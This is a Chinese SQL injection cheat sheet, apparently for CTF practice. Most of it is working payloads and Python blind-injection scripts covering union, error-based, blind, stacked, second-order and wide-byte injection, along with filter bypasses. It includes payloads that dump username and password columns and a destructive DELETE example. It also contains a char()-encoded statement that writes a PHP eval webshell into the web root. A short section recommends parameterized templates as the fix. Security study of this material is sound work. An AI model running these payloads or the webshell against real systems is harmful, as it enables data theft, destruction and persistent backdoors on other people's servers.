sql注入的常见姿势
一、SQL注入
漏洞成因
当应用向后台发送数据时,没有经过严格过滤,将传入的数据当成了sql语句进行执行,导致了sql注入。
$sql="select * from members where userid=".$_GET[userid]; |
账号密码都存在注入
正常后端语句
select * from user1 where username='用户名' and password='密码' |
输入’=’ 此时语句为如下,用户名 空等于空,密码空等于空,条件成立登录成功
select * from user1 where username=''='' and password=''='' |
正常的万能密码传入’or’1’=’1 时语句如下,or是或,其中一个条件满足即可
select * from user1 where username=''or'1'='1' and password=''or'1'='1' |
正常的万能密码传入’or’1’=’1 时语句如下,or是或,其中一个条件满足即可
select * from user1 where username=''or'1'='1' and password=''or'1'='1' |
二、账号存在注入
后端语句,是根据用户名查询出密码,然后跟我们输入的密码进行比对
select * from user1 where username='用户名' |
用户名单引号结果如下
知道列数的情况下可以利用联合注入来把返回的内容替换
后端是md5加密那么,我们把密码部分替换成加密后的md5
此时查询出来的密码为md5了
1行(0.001秒)编辑,EXPLAIN,导出
利用这个方法,我们传参为a,后端加密成 0cc175b9c0f1b6a831c399e269772661
此时数据库查询返回的密码为0cc175b9c0f1b6a831c399e269772661 我们传入的密码为a经过md5加密后也等于上面这个值所以登陆成功
3.账号存在注入限制长度
后端语句,是根据用户名查询出密码,然后跟我们输入的密码进行比对,跟上一题一样唯一多的就是多了长度限制
用上一题payload显示长度过长
mysql内部有md5等加密函数能够实现
成功登录,绕过长度限制
4.账号存在单引号过滤,可利用\转义
后端语句如下
select * from user1 where username=’用户名’ and password=’密码’
输入单引号会被后端替换成',输入的单引号会被当成 “数据”
select * from user1 where username=’abc'‘ and password=’1312312’
但是 账号跟密码都输入\的时候会把原来的单引号给转义 比如账号输入 abc\ 密码输入cba,很明显可以看到cba这部分是可以执行的部分而并非 “数据”
那么输入即可登陆成功
username=&password=or+1=1–+\
后端语句此时如下
三、其他
3.1为什么payload注释后面会多奇奇怪怪的随机字符
经常能碰到payload如下这种情况注释后面跟着其他字符
mysql的注释–后面必须要跟着空白字符才生效
select * from user1 where username=’A’ – 这是注释内容
在开发中一般会去除接受到的参数的前后空白字符比如php的trim函数
PHPTRIM()函数从字符串的两端删除空白字符和其他预定义字符.
所以在注释后面加上其他字符可以防止–+里面的+被去除也不影响注释
3.2快速判断数据库
当在用两个单引号判断注入的时候,两个单引号之间可以放内容
例如url如下
后端语句如下
select * from sqli_data where id=’1’’’ order by id limit 1
在两个单引号之间输入%0b不会报错
http://192.168.0.217/?id=1'%0B‘
通过不同数据库支持的字符不同即可得到数据库类型
mysql 支持 %0A %0b 等
Oracle 支持 %0A %00等
mssql 支持 %1F….等
利用/**/发现正常
加上感叹号在加点内容后报错,判断为mysql,因为mysql支持内联注入
/!AAA/
3.3 mysql注释字符
–空白字符 %09 %0b
#
‘;%00
sql注入的常见情况是
单引号和双引号引起状态码和报错信息的出现,比如200的页面,输入一个单引号变成500,两个则重新变成200
攻击方式
黑客是可以根据所能控制的内容在SQL语句的上下文导致不同的结果的,这种不同主要体现在不同的数据库特性上和细节上
,因为很多的数据库在标准的SQL之外也会实现一些自身比较特别的功能和扩展,常见的有Sqlserver的多语句查询,Mysql的高权限可以读写系统文件,Oracle经常出现的一些系统包提权漏洞。
修复方案
比较传统的修复方式一般认为是对输入的数据进行有效的过滤,但是由于输入的来源太过广泛,可能来自于数据库,HTTP请求,文件或者其他的数据来源,较难对所有进入的数据在各种场景下进行有效的过滤。 事实上最罪恶的不是数据,而是我们使用数据的方式,最为彻底的修复一定要查找最为彻底的根源,我们可以看到最后的根源在于对数据和指令的不分离,所以在修复的时候应该极力将数据和指令分离。目前较为提倡的,同时在各种数据库操作框架里体现的方式就是以填充模板的方式来代替传统的拼接的方式进行数据库查询,譬如:
$SqlTemplate="select * from members where userid={userid|int}"; |
模板里有关数据及数据自身意义的描述,PreSql方法将实现将模板和数据安全的转换为SQL语句的功能,以保障最终的安全的实现
姿势总结
注释
我们篡改SQL语句很多时候都会使用到注释,SQL语法中的注释符有以下几种:
# |
mysql注入
mysql数据库
MySQL是一个关系型数据库管理系统,由瑞典 MySQL AB 公司开发,目前属于 Oracle 公司。MySQL 是一种 关联数据库管理系统
,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。
一个完整的mysql管理系统结构通常如下图:
可以看到,mysql可以管理 多个数据库
,一个数据库可以包含 多个数据表
,而一个数据表有含有 多条字段
,一行数据正是多个字段同一行的一串数据。
联合查询
很多时候联合查询也会和其他的几种查询方式一起使用。
联合查询用到的SQL语法知识
UNION可以将前后两个查询语句的结果拼接到一起,但是会自动去重。 |
具有类似功能的还有JOIN https://blog.csdn.net/julielele/article/details/82023577 但是是一个对库表等进行连接的语句,我们在后续的绕过中会提到利用它来进行无列名注入。
判断是否存在注入,注入是字符型还是数字型,闭合情况,绕过方式
?id=1'
?id=1"
?id=1')
?id=1")
?id=1' or 1#
?id=1' or 0#
?id=1' or 1=1#
?id=1' and 1=2#
?id=1' and sleep(5)#
?id=1' and 1=2 or '
?id=1\猜测SQL查询语句中的字段数
使用 order/group by 语句,通过往后边拼接数字指导页面报错,可确定字段数量。
1' order by 1#
1' order by 2#
1' order by 3#
1 order by 1
1 order by 2
1 order by 3
```
- 使用 union select 联合查询,不断在 union select 后面加数字,直到不报错,即可确定字段数量。
```bash
1' union select 1#
1' union select 1,2#
1' union select 1,2,3#
1 union select 1#
1 union select 1,2#
1 union select 1,2,3#
确定显示数据的字段位置
使用 union select 1,2,3,4,… 根据回显的字段数,判断回显数据的字段位置。
-1' union select 1#
-1' union select 1,2#
-1' union select 1,2,3#
-1 union select 1#
-1 union select 1,2#
-1 union select 1,2,3#
注意:
- 若确定页面有回显,但是页面中并没有我们定义的特殊标记数字出现,可能是页面进行的是单行数据输出,我们让前边的 select 查询条件返回结果为空即可。
- ⼀定要拼接够足够的字段数,否则SQL语句报错。
- 在回显数据的字段位置使用 union select 将我们所需要的数据查询出来即可。包括但不限于:
获取当前数据库名
-1' union select 1,2,database()--+
获取当前数据库的表名
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+获取表中的字段名
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+获取数据
-1' union select 1,2,group_concat(id,0x7c,username,0x7c,password) from users--+
-1' union select 1,(select group_concat(id,0x7c,username,0x7c,password) from users),3--+一般情况下就是这样的一个顺序,
确定联合查询的字段数->确定联合查询回显位置->爆库->爆表->爆字段->爆数据。
我们可以看到这里使用了group_concat来拼接查询多个数据,在很多种查询中都有使用这个函数来提高效率,同时还可以拼接十六进制特殊字符来分隔,同时还使用了information_shcema表获取表信息、字段信息,这个表在低版本mysql中不存在,同时有时还会被过滤,这也会是我们绕过的一个方向。
在Mysql5.0以上的版本中加入了一个information_schema这个系统表,这个系统表中包含了该数据库的所有数据库名、表名、列表,可以通过SQL注入来拿到用户的账号和口令,而Mysql5.0以下的只能暴力跑表名;5.0 以下是多用户单操作,5.0 以上是多用户多操作。
报错注入
大体的思路就是利用报错回显,同时我们的查询指令或者SQL函数会被执行,报错的过程可能会出现在查询或者插入甚至删除的过程中。
floor()
floor()(8.x>mysql>5.0)双查询报错注入
函数返回小于或等于指定值(value)的最小整数,取整
通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(0)*2)的不确定性,即可能为0也可能为1
group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表中的数据;如果该key不存在于临时表中,则在临时表中插入key所在行的数据。
group by floor(random(0)*2)出错的原因是key是个随机数,检测临时表中key是否存在时计算了一下floor(random(0)*2)可能为0,如果此时临时表只有key为1的行不存在key为0的行,那么数据库要将该条记录插入临时表,由于是随机数,插时又要计算一下随机值,此时floor(random(0)*2)结果可能为1,就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值。
?id=0’ union select 1,2,3 from(select count(*),concat((select concat(version(),’-’,database(),’-’,user()) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ |
可以看到这里实际上不光使用了报错注入还是用了刚刚的联合查询,同时还是一个双查询的报错注入,当在一个聚合函数,比如count()函数后面如果使用group by分组语句的话,就可能会把查询的一部分以错误的形式显示出来。但是要多次测试才可以得到报错
大体思路就是当在一个聚合函数,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来,但是因为随机数要测试多次才能得到报错,上面报错注入函数中的第一个Floor()就是这种情况。
extractvalue()
对XML文档进行查询的函数
第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。
and (extractvalue(‘anything’,concat(‘#’,substring(hex((select database())),1,5)))) |
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称 文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
由于updatexml的第二个参数需要Xpath格式的字符串,如果不符合xml格式的语法,就可以实现报错注入了。
这也是一种非常常见的报错注入的函数。
' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ |
exp(x)
返回 e 的 x 次方,当 数据过大 溢出时报错,即 x > 709
mail=') or exp(~(select * from (select (concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from manage),0x7e))) as asd))--+ |
geometrycollection() mysql 版本5.5
(1)函数解释:
GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。
(2)官方文档中举例的用法如下:
GEOMETRYCOLLECTION(POINT(10 10), POINT(30 30), LINESTRING(15 15, 20 20))
(3)报错原因:
因为MYSQL无法使用这样的字符串画出图形,所以报错
1') and geometrycollection((select * from(select * from(select column_name from information_schema.columns where table_name='manage' limit 0,1)a)b)); %23 |
这里和我们上面学过的cancat和上一关学的内置表有两个梦幻联动
multipoint() mysql 版本5.5
(1)函数解释:
MultiPoint是一种由Point元素构成的几何对象集合。这些点未以任何方式连接或排序。
(2)报错原因:
同样是因为无法使用字符串画出图形与geometrycollection类似
1') and multipoint((select * from(select * from(select version())a)b)); %23 |
polygon()
polygon来自希腊。 “Poly” 意味 “many” , “gon” 意味 “angle”.
Polygon是代表多边几何对象的平面Surface。它由单个外部边界以及0或多个内部边界定义,其中,每个内部边界定义为Polygon中的1个孔。
') or polygon((select * from(select * from(select (SELECT GROUP_CONCAT(user,':',password) from manage))asd)asd))--+ |
mutipolygon()
') or multipolygon((select * from(select * from(select (SELECT GROUP_CONCAT(user,':',password) from manage))asd)asd)) |
linestring()
报错原理:
mysql的有些几何函数( 例如geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring() )对参数要求为几何数据,若不满足要求则会报错,适用于5.1-5.5版本 (5.0.中存在但是不会报错)
1') and linestring((select * from(select * from(select database())a)b))--+; |
multilinestring()
同上
ST.LatFromGeoHash()(mysql>=5.7.x)
') or ST_LatFromGeoHash((select * from(select * from(select (select (concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from manage),0x7e))))a)b))--+ |
ST.LongFromGeoHash
同上 嵌套查询
ST_Pointfromgeohash (mysql>5.7)
获取数据库版本信息
')or ST_PointFromGeoHash(version(),1)--+ |
布尔盲注
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取sql语句的执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。
对于基于布尔的盲注,可通过构造真or假判断条件(数据库各项信息取值的大小比较, 如:字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码…), 将构造的sql语句提交到服务器,然后根据服务器对不同的请求返回不同的页面结果 (True、False);然后不断调整判断条件中的数值以逼近真实值,特别是需要关注响应从True<–>False发生变化的转折点。
用到的SQL语法知识
会用到截取字符的函数:substr()
可以直接判断字符或者根据ASCII码来判断,利用ASCII码时要用到ASCII()函数来将字符转换为ASCII码值。
还用到了各种运算符,<,>,=当然不必多提,但是在下面POST的方式中用到了异或符号^,这里其实是一种异或注入的方法,当我们在尝试SQL注入时,发现union,and被完全过滤掉了,就可以考虑使用异或注入。
异或运算规则: |
注意这里会多加一个^0或1是因为在盲注的时候可能出现了语法错误也无法判断,而改变这里的0或1,如果返回的结果是不同的,那就可以证明语法是没有问题的.
注入流程
首先通过页面对于永真条件or 1=1 与永假条件 and 1=2 的返回内容是否存在差异进行判断是否可以进行布尔盲注。
下面给出常用的布尔盲注脚本。
GET型注入
import requests
import time
url = 'http://474d31bb-1f69-4636-9798-319f27a7fb08.node3.buuoj.cn/'
cookies = { # 如果目标网站要事先登录,就加上cookies吧
"PHPSESSID":"c8ab8r49nd2kk0qfhs0dcaktl3"
}
flag = ''
for i in range(1,90000):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
payload = "http://474d31bb-1f69-4636-9798-319f27a7fb08.node3.buuoj.cn/Less-8/?id=0' or ascii(substr(database(),%d,1))>%d-- " %(i,mid) # 注意get型的注入注释符要用--空格
res = requests.get(url=payload)
if 'You are in' in res.text: # 为真时,即判断正确的时候的条件
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)POST型注入
import requests
url = 'http://81689af7-4cd5-432c-a88e-f5113e16c7c1.node3.buuoj.cn/index.php'
flag = ''
for i in range(1,250):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
#payload = 'http://d63d924a-88e3-4036-b463-9fc6a00f4fef.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
payload = "0^(ascii(substr((select(flag)from(flag)),%d,1))>%d)#" %(i,mid)
datas = {
"id":payload
}
res = requests.post(url=url,data=datas)
if 'girlfriend' in res.text: # 为真时,即判断正确的时候的条件
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
首先,我们先分析脚本的思路,脚本利用了request库来发送请求,同时定义了一个flag字符串用来储存flag。然后写了一个for循环,封顶跑250遍,然后定义了low和high,这里根据的是ASCII码中的打印字符,定义了中间值,因为一会儿要使用的是二分法,当low<high时进入while循环,执行payload是否大于mid的判断,这里GET和POST略有区别,GET传入的键值对,利用requests.post方法进行请求,GET直接把Payload拼接在url后面进行requests.get方法即可,然后根据我们判断真假的方式写一个if循环,这里的res.text是返回数据,可以先写个简单脚本看一下该怎么从其中判断真假,如果为真low=mid+1,然后再取中间值,如果为假则high=mid然后取中间值,直到low大于high就能确定出该位置的ASCII码了,然后最下面的if循环是排除掉在两端的特殊情况,然后每次循环打印一次flag,有时候可能还要设置延时,这里没有管。
利用异或的:
?id=0'^1--+ |
利用order by的
该方法只适用于表里就一行数据的时候。 |
如果注入的时候没有报错,我们又不知道列名,就只能用 order by 盲注了。当然,在 过滤了括号 的时候,order by 盲注也是个很好的办法。
order by 的主要作用就是让查询出来的数据根据第n列进行排序(默认升序),我们可以使用order by排序比较字符的 ascii 码大小,从第⼀位开始比较,第⼀位相同时比较下⼀位。
利用方式参见如下测试:
mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3; |
通过逐位判断便可得到password
参考脚本:
import requests |
时间盲注
有的盲注既不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断,其实也是从另一个我们能控制的角度来判断了布尔值。
对于基于时间的盲注,通过构造真or假判断条件的sql语句, 且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求, 观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。
首先使用以下payload,根据页面的响应是否有延迟来判断是否存在注入:
1' and sleep(5)# |
时间盲注用到的SQL语法知识
一般的时间盲注主要就是使用sleep()函数进行时间的延迟,然后通过if判断是否执行sleep():
admin' and if(ascii(substr((select database()),1,1))>1,sleep(3),0)# |
trim配合比较。
trim([both/leading/trailing] 目标字符串 FROM 源字符串)
从源字符串中去除首尾/首/尾的目标字符串,如寻找字符串第一位,假定X代表某字符,trim(leading X from ‘abcd’) = trim(leading X+1 from ‘abcd’)不相等,说明正确结果是X或X+1再进行trim(leading X+1 from ‘abcd’) = trim(leading X+2 from ‘abcd’) 相等则正确为X,不相等则X+1正确
若trim(leading X from ‘abcd’) = trim(leading X+1 from ‘abcd’)相等说明X与X+1都为字符串的首字符,不存在这种情况,所以需要继续比较X+1与X+2直至相等
注入流程
时间盲注我们也是利用脚本完成:
import requests |
这是一个GET方式的时间盲注,更改脚本请求方式的方法可以参照上面的布尔盲注,这两个脚本的编写思路是一样的,只是在判断方式上有所区别。
时间盲注在CTF比赛和平时生产环境中都是比较常见的,但是当我们常⽤的函数被过滤的话,那该怎么办呢?还有以下几种时间盲注方式。
笛卡尔积延时盲注
count(*) 后面所有表中的列笛卡尔积数,数量越多越卡,就会有延迟,类似之前某比赛pgsql的延时注入也可以利用此来 打时间差,从而达到延时注入的效果:
mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C; |
得到的结果都会有延迟。这里选用information_schema.columns表的原因是其内部数据较多,到时候可以根据实际情况调换。
那么我们就可以使用这个原理,并配合if()语句进行延时注入了,payload 与之前相似,类似如下:
admin' and if(ascii(substr((select database()),1,1))>1,(SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C),0)# |
给出一个笛卡尔积延时注入脚本:
import requests |
堆叠注入
在SQL中,分号; 是用来表示一条sql语句的结束。试想一下,我们在结束一个sql语句后继续构造下一条语句,会不会一起执行? 因此这个想法也就造就了堆叠注入。
而联合注入也是将两条语句合并在一起,两者之间有什么区别么?
区别就在于 union 或者union all执行的语句类型是有限制的,可以用来执行的是查询语句,而堆叠注入可以执行的是任意的语句。 例如以下这个例子。用户输入:1; DELETE FROM products; 服务器端生成的sql语句为:select * from products where id=1;DELETE FROM products; 当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。
但是,这种堆叠注入也是有局限性的。堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。
虽然我们前面提到了堆叠查询可以执行任意的sql语句,但是这种注入方式并不是十分的完美的。在有的Web系统中,因为代码通常只返回一个查询结果,因此,堆叠注入第二个语句产生的错误或者执行结果只能被忽略,我们在前端界面是无法看到返回结果的。因此,在读取数据时,建议配合使用 union 联合注入。
一般存在堆叠注入的都是由于使用 mysqli_multi_query() 函数执行的sql语句,该函数可以执行一个或多个针对数据库的查询,多个查询用分号进行分隔。
注入流程
# 读取数据 |
下面是MySQL堆叠注入的几种常见姿势。
rename 修改表名
1';rename table words to words1;rename table flag_here to words;# |
rename/alter 修改表名与字段名
1';rename table words to words1;rename table flag_here to words;alter table words change flag id varchar(100);# |
利用 HANDLER 语句
如果rename、alter被过滤了,我们可以借助HANDLER语句来bypass。在不更改表名的情况下读取另一个表中的数据。
HANDLER … OPEN 语句打开一个表,使其可以使用后续 HANDLER … READ 语句访问,该表对象未被其他会话共享,并且在会话调用 HANDLER … CLOSE 或会话终止之前不会关闭,详情请见:https://www.cnblogs.com/taoyaostudy/p/13479367.html
1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;# |
堆叠注入中的盲注
堆叠注入中的盲注往往是插入sql语句进行实践盲注,就比如 [SWPU2019]Web4 这道题。编写时间盲注脚本:
#author: c1e4r |
这里还涉及到了一些json的内容,json.dumps() 是把python对象转换成json对象的一个过程,生成的是字符串。web服务中传输信息的一种方式。
二次注入
二次注入用到的SQL语法知识
通常二次注入的成因会是插入语句,我们控制自己想要查询的语句插入到数据库中再去找一个能显示插入数据的回显的地方(可能是登陆后的用户名等等、也有可能是删除后显示删除内容的地方~),恶意插入查询语句的示例如下:
insert into users(id,username,password,email) values(1,'0'+hex(database())+'0','0'+hex(hex(user()))+'0','123@qq.com') |
需要对后端的SQL语句有一个猜测
这里还有一个点,我们不能直接将要查询的函数插入,因为如果直接插入的话,’database()’会被识别为字符串,我们需要想办法闭合前后单引号的同时将我们的查询插入,就出现了’0’+database()+’0’这样的构造,但是这个的回显是0,但是在我们进行了hex编码之后就能正常的查询了,也就是上面出现的’0’+hex(database())+’0’
注入流程
首先找到插入点,通常情况下是一个注册页面,register.php这种,先简单的查看一下注册后有没有什么注册时写入的信息在之后又回显的,若有回显猜测为二次查询。
insert into users(id,username,password,email) values(1,'0'+hex(database())+'0','0'+hex(hex(user()))+'0','123@qq.com') |
构造类似于values中的参数进行注册等操作,然后进行查看,将hex编码解码即可,可能会有其他的先限制,比如超过10位就会转化为科学计数法,我们就需要使用from for语句来进行一个限制,可以编写脚本。
import requests |
常见绕过
结尾注释符绕过
Mysql中常见的注释符
、# %23 --+或-- - ;%00 |
如果所有的注释符全部被过滤了,把我们还可以尝试直接使用引号进行闭合,这种方法很好用。
字符串变换绕过
# 大小写绕过 |
过滤 and、or 绕过
管道符
and => && |
使用^进行异或盲注绕过
异或运算规则:
1^1=0 0^0=0 0^1=1
1^1^1=0 1^1^0=0
构造payload:’^ascii(mid(database(),1,1)=98)^0
注意这里会多加一个^0或1是因为在盲注的时候可能出现了语法错误也无法判断,而改变这里的0或1,如果返回的结果是不同的,那就可以证明语法是没有问题的.
过滤空格绕过
以下字符可以代替空格:
# 使用注释符/**/代替空格: |
同时任然可以利用异或符号进行盲注,我i们可以看到上面的payload中完全可以不存在空格。
过滤括号绕过
利用 order by 进行布尔盲注
上面有
过滤比较符号(=、<、>)绕过
比较符号一般也只出现在盲注中,所以都尽可能搭配了脚本。
使用 in() 绕过
/?id=' or ascii(substr((select database()),1,1)) in(114)--+ // 错误 |
综上所述,很明显和普通的布尔盲注差不多,于是写个GET的二分法盲注脚本:
import requests |
LIKE 注入
在LIKE子句中,百分比(%)通配符允许匹配任何字符串的零个或多个字符。下划线 _ 通配符允许匹配任何单个字符。匹配成功则返回1,反之返回0,可用于sql盲注。
判断数据库长度
可用length()函数,也可用_,如:/?id=' or database() like '________'--+ // 回显正常
判断数据库名
/?id=' or database() like 's%' --+
/?id=' or (select database()) like 's%' --+
或者:
/?id=' or database() like 's_______' --+
/?id=' or (select database()) like 's_______' --+如上图所示,回显正常,说明数据库名的第一个字符是s。
综上所述,很明显和普通的布尔盲注差不多,于是写个GET的二分法盲注脚本:
import requests |
REGEXP 注入
REGEXP注入,即regexp正则表达式注入。REGEXP注入,又叫盲注值正则表达式攻击。应用场景就是盲注,原理是直接查询自己需要的数据,然后通过正则表达式进行匹配。
判断数据库长度
/?id=' or (length(database())) regexp 8 --+ // 回显正常
判断数据库名
/?id=' or database() regexp '^s'--+ // 回显正常
/?id=' or database() regexp 'se'--+ // 回显正常, 不适用^和$进行匹配也可以
/?id=' or database() regexp '^sa'--+ // 报错
/?id=' or database() regexp 'y$'--+ // 回显正常
脚本:
import requests |
以上脚本都要注意是掌握编写思路,不是干抄脚本。
宽字节注入
前置知识
magic_quotes_gpc (魔术引号开关
magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。
单引号(’)、双引号(”)、反斜线(\)等字符都会被加上反斜线,我们输入的东西如果不能闭合,那我们的输入就不会当作代码执行,就无法产生SQL注入。
addslashes()函数
返回在预定义字符之前添加反斜杠的字符串
预定义字符:单引号(’),双引号(”),反斜杠(\),NULL
宽字节概念:
- 单字节字符集:所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127)
- 多字节字符集:在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。
- UTF-8 编码: 是一种编码的编码方式(多字节编码),它可以使用1~4个字节表示一个符号,根据不同的符号而变化字节长度。
- 常见的宽字节: GB2312、GBK、GB18030、BIG5、Shift_JIS GB2312 不存在宽字节注入,可以收集存在宽字节注入的编码。
- 宽字节注入时利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字
宽字节SQL注入主要是源于程序员设置数据库编码为非英文编码那么就有可能产生宽字节注入。
例如说MySql的编码设置为了SET NAMES ‘gbk’或是 SET character_set_client =gbk,这样配置会引发编码转换从而导致的注入漏洞。
宽字节SQL注入的根本原因:
宽字节SQL注入就是PHP发送请求到MySql时使用了语句
SET NAMES ‘gbk’ 或是SET character_set_client =gbk 进行了一次编码,但是又由于一些不经意的字符集转换导致了宽字节注入。
magic_quotes_gpc的作用:当PHP的传参中有特殊字符就会在前面加转义字符’’,来做一定的过滤
为了绕过magic_quotes_gpc的,于是乎我们开始导入宽字节的概念
我们发现\的编码是%5c,然后我们会想到传参一个字符想办法凑成一个gbk字符,例如:‘運’字是%df%5c
SELECT * FROM users WHERE id='1\'' LIMIT 0,1 |
这条语句因为\使我们无法去注入,那么我们是不是可以用%df吃到%5c,因为如果用GBK编码的话这个就是運,然后成功绕过
SELECT * FROM users WHERE id='1�\'#' LIMIT 0,1 |
虽然是写在了过滤引号的位置但是其实不止适用于过滤引号
使用反斜杠 \ 逃逸 Sql 语句
如果没有过滤反斜杠的话,我们可以使用反斜杠将后面的引号转义,从而逃逸后面的 Sql 语句。
假设sql语句为:
select username, password from users where username='$username' and password='$password'; |
假设输入的用户名是 admin\,密码输入的是 or 1# 整个SQL语句变成了
select username,password from users where username='admin\' and password=' or 1#' |
由于单引号被转义,and password=这部分都成了username的一部分,即
username='admin\' and password=' |
这样 or 1 就逃逸出来了,由此可控,可作为注入点了。
堆叠注入时利用 MySql 预处理
在遇到堆叠注入时,如果select、rename、alter和handler等语句都被过滤的话,我们可以用MySql预处理语句配合concat拼接来执行sql语句拿flag。
- PREPARE:准备一条SQL语句,并分配给这条SQL语句一个名字(hello)供之后调用
- EXECUTE:执行命令
- DEALLOCATE PREPARE:释放命令
- SET:用于设置变量(@a)
1';sEt @a=concat("sel","ect flag from flag_here");PRepare hello from @a;execute hello;# |
这里还用大小写简单绕了一下其他过滤
MySql 预处理配合十六进制绕过关键字
基本原理如下:
mysql> select hex('show databases'); |
即payload类似如下:
1';sEt @a=0x73686F7720646174616261736573;PRepare hello from @a;execute hello;# |
MySql预处理配合字符串拼接绕过关键字
原理就是借助char()函数将ascii码转化为字符然后再使用concat()函数将字符连接起来,有了前面的基础这里应该很好理解了:
set @sql=concat(char(115),char(101),char(108),char(101),char(99),char(116),char(32),char(39),char(60),char(63),char(112),char(104),char(112),char(32),char(101),char(118),char(97),char(108),char(40),char(36),char(95),char(80),char(79),char(83),char(84),char(91),char(119),char(104),char(111),char(97),char(109),char(105),char(93),char(41),char(59),char(63),char(62),char(39),char(32),char(105),char(110),char(116),char(111),char(32),char(111),char(117),char(116),char(102),char(105),char(108),char(101),char(32),char(39),char(47),char(118),char(97),char(114),char(47),char(119),char(119),char(119),char(47),char(104),char(116),char(109),char(108),char(47),char(102),char(97),char(118),char(105),char(99),char(111),char(110),char(47),char(115),char(104),char(101),char(108),char(108),char(46),char(112),char(104),char(112),char(39),char(59));prepare s1 from @sql;execute s1; |
也可以不用concat函数,直接用char函数也具有连接功能:
set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,119,104,111,97,109,105,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare s1 from @sql;execute s1; |
过滤逗号绕过
当逗号被过滤了之后,我们便不能向下面这样正常的时候substr()函数和limit语句了:
select substr((select database()),1,1); |
使用from…for…绕过
我们可以使用 from…for.. 语句替换 substr() 函数里的 ,1,1:
select substr((select database()) from 1 for 1); |
即,from用来指定从何处开始截取,for用来指定截取的长度,如果不加for的话则 from 1 就相当于从字符串的第一位一直截取到最后:
select substr((select database()) from 1); # security |
使用offset关键字绕过
我们可以使用 offset 语句替换 limit 语句里的逗号:
select * from users limit 1 offset 2; |
利用join与别名绕过
select host,user from user where user='a'union(select*from((select`table_name`from`information_schema`.`tables`where`table_schema`='mysql')`a`join(select`table_type`from`information_schema`.`tables`where`table_schema`='mysql')b)); |
过滤information_schema绕过与无列名注入
当过滤or时,这个库就会被过滤,那么mysql在被waf禁掉了information_schema库后还能有哪些利用思路呢?
information_schema 简单来说,这个库在mysql中就是个信息数据库,它保存着mysql服务器所维护的所有其他数据库的信息,包括了数据库名,表名,字段名等。在注入中,infromation_schema库的作用无非就是可以获取到table_schema、table_name、column_name这些数据库内的信息。
能够代替information_schema的有:
sys.schema_auto_increment_columns 只显示有自增的表
sys.schema_table_statistics_with_buffer
x$schema_table_statistics_with_buffer
select * from user where id = -1 union all select 1,2,3,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database(); |
mysql.innodb_table_stats
mysql.innodb_table_index
以上大部分特殊数据库都是在 mysql5.7 以后的版本才有,并且要访问sys数据库需要有相应的权限。
但是在使用上面的后两个表来获取表名之后select group_concat(table_name) from mysql.innodb_table_stats,我们是没有办法获得列的,这个时候就要采用无列名注入的办法。
无列名注入
123法
我们可以利用一些查询上的技巧来进行无列名、表名的注入。
如图所见列名会被定义为1,2,3
当我们结合了union联合查询之后
